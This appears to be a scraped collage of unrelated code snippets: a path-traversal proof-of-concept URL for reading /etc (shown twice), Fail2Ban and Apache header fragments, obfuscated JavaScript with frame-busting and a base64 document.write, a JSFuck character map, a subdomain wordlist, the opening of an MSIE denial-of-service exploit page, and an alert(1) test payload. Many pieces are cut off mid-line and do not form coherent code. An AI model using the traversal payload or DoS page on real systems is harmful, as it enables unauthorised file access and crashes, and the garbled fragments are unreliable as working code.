POC :-
/html/filetree_get.stm?ep=1&t=tree&id=&p=/usb/../../../../../../../../../../../../../../../../etc/
# Fail2Ban configuration file | |
# | |
# NOTE | |
# You should set up in the jail.conf file, the maxretry and findtime carefully in order to avoid false positives. | |
# | |
# Author: http://www.go2linux.org | |
# Modified by: samnicholls.net | |
# * Mon 6 Jun 2016 - Updated failregex to capture HOST group correctly | |
[Definition] |
# Add this line to "\etc\apache2\apache2.conf" | |
# <-------------------------------------------------------------> | |
# LoadModule headers_module /usr/lib/apache2/modules/mod_headers.so | |
<IfModule mod_headers.c> | |
Header set x-frame-options "deny" | |
Header set X-Content-Type-Options "nosniff" | |
Header set X-XSS-Protection "1; mode=block" | |
Header set cache-control "no-store, no-cache, must-revalidate, post-check=0, pre-check=0" | |
</IfModule> | |
# <-------------------------------------------------------------> |
if(window.console || 'console' in window) { | |
console.log('%c \x6a\x61\x6a\x61\x6a\x61\x20\x70\x65\x6e\x64\x65\x6a\x6f\x21\x21\x21 ', 'color:#FF0000; font-size:40px;'); | |
} if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0)) { | |
console.log('\x25\x63\x20\x4f\x4b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20', 'color:#FFD100; font-size:17px;'); | |
location.replace("\40\141\142\157\165\164\72\142\154\141\156\153"); | |
}var ud=""; | |
document.write(atob('\x50\x47\x6c\x6d\x63\x6d\x46\x74\x5a\x53\x42\x33\x61\x57\x52\x30\x61\x44\x30\x69\x4d\x43\x49\x67\x61\x47\x56\x70\x5a\x32\x68\x30\x50\x53\x49\x77\x49\x69\x42\x7a\x63\x6d\x4d\x39\x49\x6d\x68\x30\x64\x48\x42\x7a\x4f\x69\x38\x76\x64\x33\x64\x33\x4c\x6e\x6c\x76\x64\x58\x52\x31\x59\x6d\x55\x75\x59\x32\x39\x74\x4c\x32\x56\x74\x59\x6d\x56\x6b\x4c\x33\x67\x79\x53\x31\x42\x76\x53\x32\x68\x48\x57\x55\x56\x52\x50\x32\x46\x31\x64\x47\x39\x77\x62\x47\x46\x35\x50\x54\x45\x6 |
'a':'((!!+[]+"")[+!![]])', | |
'b':'((({})+"")[(+!![])+(+!![])])', | |
'c':'((({})+"")[(+!![])+(+!![])+(+!![])+(+!![])+(+!![])])', | |
'd':'((({})[""]+"")[(+!![])+(+!![])])', | |
'e':'((!!+[]+"")[(+!![])+(+!![])+(+!![])+(+!![])])', | |
'f':'((!!+[]+"")[+[]])', | |
'g':'"\\x67"', | |
'h':'"\\x68"', | |
'i':'((+!![]/+[]+"")[(+!![])+(+!![])+(+!![])])', | |
'j':'((({})+"")[(+!![])+(+!![])+(+!![])])', |
www | |
ftp | |
localhost | |
webmail | |
smtp | |
pop | |
ns1 | |
webdisk | |
ns2 |
document.onkeyup= (e) => { | |
var e = e || window.event; | |
if(e.which == 17||e.which == 73) { | |
window.open(`${window.location.href}/direccion`,'_blank','noopener'); | |
return false; | |
} | |
} |
<!DOCTYPE html> | |
<html> | |
<head> | |
<title></title> | |
</head> | |
<body> | |
<center> | |
MSIE v11.371.16299 Denial Of Service by hyp3rlinx | |
<br> | |
<a href=".cmd:" id="hate">crashy ware shee</a> |
POC :-
/html/filetree_get.stm?ep=1&t=tree&id=&p=/usb/../../../../../../../../../../../../../../../../etc/
dcdsdscdscds |
alert(1); |